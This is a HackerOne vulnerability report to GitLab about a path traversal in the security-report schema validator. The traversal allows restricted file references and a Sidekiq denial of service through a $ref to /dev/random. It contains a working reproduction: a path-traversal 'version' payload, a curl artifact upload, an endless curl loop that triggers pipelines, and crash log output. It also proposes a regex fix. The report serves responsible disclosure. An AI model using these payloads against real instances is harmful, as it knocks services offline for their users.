Path Traversal leads to DoS and Restricted File Read through Report Artifact Parsing (Affects Gitlab.com)
HackerOne report #2401952 by pwnie
on 2024-03-05, assigned to @ngeorge1:
Report
Summary
lib/gitlab/ci/parsers/security/validators/schema_validator.rb contains a File.join call whose arguments include user-controlled input (report_version):
def schema_path
  # The schema version selection logic here is described in the user documentation:
  # https://docs.gitlab.com/ee/user/application_security/#security-report-validation
  report_declared_version = File.join(root_path, report_version, file_name)
  return report_declared_version if File.file?(report_declared_version)
This value can be controlled by uploading a bogus artifact file named "gl-secret-detection-report.json" with artifact type "secret_detection", whose version JSON field contains a path traversal.
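For illustration, File.join performs no sanitization of "..", so a crafted version escapes root_path entirely. A minimal sketch (the paths and the uploaded-file location below are illustrative, not exact):

require 'pathname'

root_path      = '/opt/gitlab/embedded/service/gitlab-rails/lib/gitlab/ci/parsers/security/validators/schemas'  # illustrative
file_name      = 'secret-detection-report-format.json'
report_version = '../' * 25 + 'var/opt/gitlab/gitlab-rails/uploads/@hashed/some/uploaded/file'                  # attacker-controlled "version"

schema_path = File.join(root_path, report_version, file_name)
puts Pathname.new(schema_path).cleanpath
# => /var/opt/gitlab/gitlab-rails/uploads/@hashed/some/uploaded/file/secret-detection-report-format.json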
The resulting path is then passed to JSONSchemer.schema(pathname) and used to validate the CI scan artifact. Since we control the schema that is used, we can use $refs to include external schemas. JSONSchemer allows file system access, though not network access unless that is explicitly passed as an option. I read the JSONSchemer code thoroughly for any way to escalate this (dumping sensitive JSON files by referencing them with $ref) and I don't think it's possible (I could be wrong). The reason is that JSONSchemer conveniently returns errors during validation, and GitLab parses them and returns them to the user:
schema_validation_errors = schema.validate(report_data).map { |error| JSONSchemer::Errors.pretty(error) }
This means that if we could reference a sensitive JSON file and somehow make the validation fail in a way that includes the values of that file, we'd be golden. However, the JSONSchemer code has a very short list of what it can return:
def pretty(error)
  data_pointer, type, schema = error.values_at('data_pointer', 'type', 'schema')
  location = data_pointer.empty? ? 'root' : "property '#{data_pointer}'"
  case type
  when 'required'
    keys = error.fetch('details').fetch('missing_keys').join(', ')
    "#{location} is missing required keys: #{keys}"
  when 'null', 'string', 'boolean', 'integer', 'number', 'array', 'object'
    "#{location} is not of type: #{type}"
  when 'pattern'
    "#{location} does not match pattern: #{schema.fetch('pattern')}"
  when 'format'
    "#{location} does not match format: #{schema.fetch('format')}"
  when 'const'
    "#{location} is not: #{schema.fetch('const').inspect}"
  when 'enum'
    "#{location} is not one of: #{schema.fetch('enum')}"
  else
    "#{location} is invalid: error_type=#{type}"
  end
schema would be the file we are referencing (any sensitive JSON file we want to leak), but since it obviously isn't a schema, it's very hard to get anything useful out of these errors. Still, there is a vast array of JSON files on a given Omnibus installation, many of them log files that we can probably influence and hence do something interesting with:
root@gitlab:/# find . -name '*.json' 2>/dev/null | wc -l
913
I find that too painstakingly boring to pursue, though, so I'll just leave it to you to decide whether or not this constitutes a file read at all.
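For reference, a minimal sketch of the $ref behaviour described above, using made-up file names under /tmp and assuming the json_schemer version bundled with GitLab at the time: a schema loaded from a Pathname resolves filesystem $refs by default, and only the coarse pretty-printed errors ever reach the user:

require 'json'
require 'json_schemer'
require 'pathname'

# A "schema" that is nothing but a $ref to another local file.
File.write('/tmp/outer-schema.json', JSON.generate({ '$ref' => 'referenced.json' }))
File.write('/tmp/referenced.json', JSON.generate({ 'type' => 'object', 'required' => ['version'] }))

schema = JSONSchemer.schema(Pathname.new('/tmp/outer-schema.json'))  # referenced.json is read from disk
puts schema.validate({}).map { |error| JSONSchemer::Errors.pretty(error) }
# => root is missing required keys: version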
The real issue I discovered is being able to hang a Rails process and rapidly consume a lot of RAM. The referenced file is ultimately read in full (see the File.read documentation):
.read(name, [length [, offset]][, opt]) ⇒ String
Opens the file, optionally seeks to the given offset, then returns length bytes (defaulting to the rest of the file). #read ensures the file is closed before returning.
By supplying /dev/random as the target path, this read never completes. I've seen people rewarded pretty big bounties for server-side ReDoS, which is why I decided to report this, e.g. #416225 (closed).
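Outside of GitLab entirely, the underlying behaviour can be sketched in a couple of lines (this mirrors what happens when the traversed schema path points at /dev/random):

require 'pathname'

# Never returns: /dev/random produces an endless stream, so the unbounded read
# never hits EOF and keeps growing its buffer, consuming memory until the
# process is killed.
Pathname.new('/dev/random').read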
Steps to reproduce
1. Configure an Omnibus GitLab instance with an Ultimate license
2. Create a project
3. Ensure the GitLab instance has shared runners available, or configure a runner for the project
4. Ensure the runner can handle more than one build at a time (in /etc/gitlab-runner/config.toml, set concurrent = 10)
5.1 Edit the .gitlab-ci.yml file in your newly created project to:
bogus_artifact:
  script: |
    curl -X POST -v -F "file=@gl-secret-detection-report.json" "YOUR_GITLAB_INSTANCE_URL/api/v4/jobs/$CI_JOB_ID/artifacts?artifact_format=raw&artifact_type=secret_detection&token=$CI_JOB_TOKEN"
5.2 Replace YOUR_GITLAB_INSTANCE_URL with your GitLab instance URL
6.1 Create a file locally, name it secret-detection-report-format.json, and set the contents to {"$ref": "/dev/random"}
6.2 Create a new issue in the project and upload the file in a comment
7. Calculate the hashed path of the uploaded file by computing the SHA2 (SHA-256) hash of the project ID (a numeric ID like 34)
8. Construct the hashed path by taking the first 2 characters of the hash as the first directory, the next 2 characters as the second directory, and the entire hash as the third. Then take the secret of the file you uploaded (copy the link URL from the comment and take just the 32-character hex part) and append it to the path constructed so far, for example: 4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/725cc8b62466087c472932f7ce4b96de (a short Ruby sketch of this computation follows these steps)
9. Create a file in your new project named gl-secret-detection-report.json with the following contents, replacing YOUR_FULL_HASH_PATH with the full path you just constructed:
{"version": "../../../../../../../../../../../../../../../../../../../../../../../../../var/opt/gitlab/gitlab-rails/uploads/@hashed/YOUR_FULL_HASH_PATH"}
10. Go to Settings -> CI/CD in your project, expand Pipeline trigger tokens, add a new token, copy the token, and save it
11. Execute the following command, replacing the placeholders appropriately:
while true; do curl -X POST \
--fail \
-F token=YOUR_PIPELINE_TOKEN \
-F ref=main \
http://YOUR_GITLAB_INSTANCE/api/v4/projects/YOUR_PROJECT_ID/trigger/pipeline; done
12. This should generate many pipelines that are then handled by the runners configured for the project. If you properly configured the runner or runners to run multiple builds at once, you should see an increase in memory usage on your GitLab instance once the pipelines complete. This is due to /dev/random being read during the artifact parsing service.
13. To verify that this is indeed crashing Sidekiq (artifact parsing runs as a worker after a pipeline completes), you can do:
cat sidekiq/current | grep -i terminate
{"severity":"INFO","time":"2024-03-05T04:06:53.471Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:08:56.919Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:16:05.432Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:17:28.958Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:18:52.534Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:25:56.008Z","message":"A worker terminated, shutting down the cluster"}
or simply watch system resource usage rapidly increase and then drop when the Sidekiq process is killed along with any jobs it was handling.
14. Since this kills Sidekiq clusters, you can disrupt any jobs that are running or scheduled to run. Essentially a Sidekiq DoS, which makes GitLab unusable.
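For steps 7 and 8, here is the hashed-path computation as a short Ruby sketch (the project ID and upload secret are examples; 3 is the project ID that yields the hash shown in step 8):

require 'digest'

project_id    = 3                                   # numeric project ID (example)
upload_secret = '725cc8b62466087c472932f7ce4b96de'  # 32-character hex secret from the upload URL (example)

hash = Digest::SHA2.hexdigest(project_id.to_s)
# => "4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce"

puts File.join(hash[0, 2], hash[2, 2], hash, upload_secret)
# => 4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/725cc8b62466087c472932f7ce4b96de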
Impact
DoS of GitLab instance Sidekiq clusters
Environment
GitLab Enterprise Edition v16.7.3-ee Omnibus Package
Implementation
- Add regex verification for report_version to Gitlab::Ci::Parsers::Security::Validators. Copy over the schema format for consistency.
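A rough sketch of what that check could look like (illustrative only, not the actual patch; the constant name and the fallback behaviour are made up):

# Only accept plain version strings such as "15.0.0" before they are ever
# joined into a filesystem path.
SUPPORTED_VERSION_FORMAT = /\A\d+\.\d+(\.\d+)?\z/

def schema_path
  unless report_version.to_s.match?(SUPPORTED_VERSION_FORMAT)
    # Fall back to a bundled default schema instead of trusting the input
    # (fallback_version is illustrative).
    return File.join(root_path, fallback_version, file_name)
  end

  report_declared_version = File.join(root_path, report_version, file_name)
  return report_declared_version if File.file?(report_declared_version)

  # ... rest of the original method unchanged ...
end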